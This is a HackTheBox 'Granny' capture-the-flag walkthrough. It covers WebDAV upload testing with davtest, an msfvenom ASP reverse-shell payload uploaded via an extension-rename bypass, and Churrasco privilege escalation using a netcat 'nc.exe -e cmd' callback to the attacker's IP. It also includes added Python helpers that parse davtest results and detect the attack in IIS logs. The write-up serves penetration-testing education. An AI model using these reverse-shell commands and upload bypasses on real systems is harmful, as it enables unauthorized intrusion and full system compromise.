
Granny Writeup - HackTheBox


Hello, welcome to the Granny Writeup from HackTheBox.

Enumeration

NMAP Open ports

In the first step, we enumerate the open ports with Nmap.

[Nmap scan output screenshots]

Port 80: HTTP
The Nmap scan reports that WebDAV is enabled and that the PUT and MOVE methods are allowed, so we are going to test it with Davtest.

Davtest

With Davtest, we can test whether files can be uploaded and executed:

davtest -url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
NOTE    Random string for this session: l8Qkwc
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_l8Qkwc
********************************************************
 Sending test files
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT     asp     FAIL
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT     cgi     FAIL
PUT     aspx    FAIL
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT     shtml   FAIL
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
********************************************************
 Checking for test file execution
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
EXEC    jsp     FAIL
EXEC    php     FAIL
EXEC    pl      FAIL
EXEC    cfm     FAIL
EXEC    jhtml   FAIL
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_l8Qkwc
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
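To make the Davtest result easier to act on, here is an added Python helper, written for this write-up and not part of davtest or the original post, that parses davtest's output into three buckets: extensions that were uploaded and executed, extensions that were uploaded but only stored, and extensions the server rejected. The sample input is a constructed excerpt laid out like the run above. From a defender's view the "stored only" bucket matters as well: the file is already on the server, and with MOVE allowed it can be renamed, so the fix is to remove anonymous write access rather than to rely on which extensions execute.

```python
import re
from typing import Dict, List

# Constructed sample input: an excerpt laid out exactly like the davtest run above.
SAMPLE_DAVTEST_OUTPUT = """\
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_l8Qkwc
********************************************************
 Sending test files
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT     asp     FAIL
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
********************************************************
 Checking for test file execution
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
EXEC    php     FAIL
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
"""

# One per-extension result line: phase (PUT/EXEC), extension, outcome.
RESULT_RE = re.compile(r"^(PUT|EXEC)\s+(\w+)\s+(SUCCEED|FAIL)\b")
# Connection and directory-creation lines carry no extension.
WRITE_RE = re.compile(r"^(OPEN|MKCOL)\s+(SUCCEED|FAIL)\b")


def parse_davtest(output: str) -> Dict[str, Dict[str, bool]]:
    """Map each tested extension to whether it was uploaded and whether it executed."""
    results: Dict[str, Dict[str, bool]] = {}
    for line in output.splitlines():
        m = RESULT_RE.match(line)
        if not m:
            continue
        phase, ext, status = m.groups()
        entry = results.setdefault(ext.lower(), {"put": False, "exec": False})
        entry[phase.lower()] = status == "SUCCEED"
    return results


def anonymous_write_allowed(output: str) -> bool:
    """True if the server accepted the MKCOL request, i.e. the client could write at all."""
    for line in output.splitlines():
        m = WRITE_RE.match(line)
        if m and m.group(1) == "MKCOL":
            return m.group(2) == "SUCCEED"
    return False


def classify(results: Dict[str, Dict[str, bool]]) -> Dict[str, List[str]]:
    """Split extensions into executed, stored-only and blocked buckets (sorted)."""
    executed = sorted(e for e, r in results.items() if r["put"] and r["exec"])
    stored_only = sorted(e for e, r in results.items() if r["put"] and not r["exec"])
    blocked = sorted(e for e, r in results.items() if not r["put"])
    return {"executed": executed, "stored_only": stored_only, "blocked": blocked}


if __name__ == "__main__":
    parsed = parse_davtest(SAMPLE_DAVTEST_OUTPUT)
    print("anonymous write allowed:", anonymous_write_allowed(SAMPLE_DAVTEST_OUTPUT))
    for bucket, exts in classify(parsed).items():
        print(f"{bucket}: {', '.join(exts) or '-'}")
```

Run it against a saved davtest log by reading the file into `parse_davtest`; a non-empty `executed` or `stored_only` bucket on a production host means the WebDAV write methods need to be disabled or authenticated.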

Exploitation

As we can see in the Davtest output above, the server executes .txt and .html files. Many other extensions can be uploaded, but we are going to use .asp.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=443 -f asp > ennove.asp.txt

So in this case we name the file .asp.txt to bypass the upload restriction.

We can use Cadaver to upload the file and then rename it, which bypasses the restriction and lets us run the exploit:

cadaver 10.10.10.15

[Cadaver session screenshot]

We trigger the exploit by visiting http://10.10.10.15/ennove.asp;.txt, with netcat listening for the reverse shell.
After running whoami, we list the account's privileges and find SeImpersonatePrivilege.

[whoami output screenshot]
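The chain above leaves a distinctive trail in the IIS W3C logs: WebDAV write methods (PUT, MOVE) from an external client, followed by a request whose path has a script extension immediately before a semicolon, which IIS 6 resolves to the .asp file. The following Python detection is an added example, not from the original post: it parses W3C extended log lines using the `#Fields:` directive and raises an alert for each write method and each semicolon-script path. The log lines are constructed to mirror the sequence above, and the field list is an assumed default subset.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample IIS W3C log (not from the box). The #Fields line is an
# assumed default subset; the requests mirror the upload/rename/trigger sequence.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2000-01-01 10:00:01 10.10.10.15 GET /default.htm - 80 - 10.10.14.19 Mozilla/5.0 200
2000-01-01 10:00:05 10.10.10.15 PUT /ennove.asp.txt - 80 - 10.10.14.19 cadaver 201
2000-01-01 10:00:09 10.10.10.15 MOVE /ennove.asp.txt - 80 - 10.10.14.19 cadaver 201
2000-01-01 10:00:14 10.10.10.15 GET /ennove.asp;.txt - 80 - 10.10.14.19 Mozilla/5.0 200
"""

# WebDAV methods that modify content on the server; on a public site they should be off.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
# A server-side script extension followed by ';': IIS 6 treats "name.asp;.txt" as name.asp,
# so the trailing ".txt" no longer keeps the file from being executed.
SEMICOLON_SCRIPT_RE = re.compile(r"\.(asp|aspx);", re.IGNORECASE)


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse W3C extended log lines into dicts keyed by the names in the #Fields directive."""
    fields = None
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # other directives (#Software, #Date) and blank lines
        if fields is None:
            raise ValueError("data line seen before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-attribute fields
        records.append(dict(zip(fields, values)))
    return records


def detect(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per WebDAV write request and per semicolon-script path request."""
    alerts: List[Dict[str, str]] = []
    for rec in records:
        method = rec.get("cs-method", "").upper()
        stem = rec.get("cs-uri-stem", "")
        base = {
            "client": rec.get("c-ip", "?"),
            "method": method,
            "path": stem,
            "status": rec.get("sc-status", "?"),
        }
        if method in WRITE_METHODS:
            alerts.append({"rule": "webdav-write", **base})
        if SEMICOLON_SCRIPT_RE.search(stem):
            alerts.append({"rule": "semicolon-script-path", **base})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_w3c(SAMPLE_IIS_LOG.splitlines())):
        print(alert)
```

A write request that returns 201 from an unauthenticated client (`cs-username` is `-`) is the actionable finding here; the semicolon rule is a second, independent signal that the stored file was then requested for execution.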

Privilege Escalation

Shell as NT AUTHORITY\SYSTEM

We are going to work in the Temp folder and, with impacket-smbserver, share Churrasco.exe (available on GitHub) with the victim machine.

impacket-smbserver smbFolder .

Then, using nc.exe (Netcat), we run churrasco.exe to send a cmd connection back to our attacker machine:

churrasco.exe "\\10.10.14.19\smbFolder\nc.exe -e cmd 10.10.14.19 4445"

[Reverse shell screenshot]

This post is licensed under CC BY 4.0 by the author.
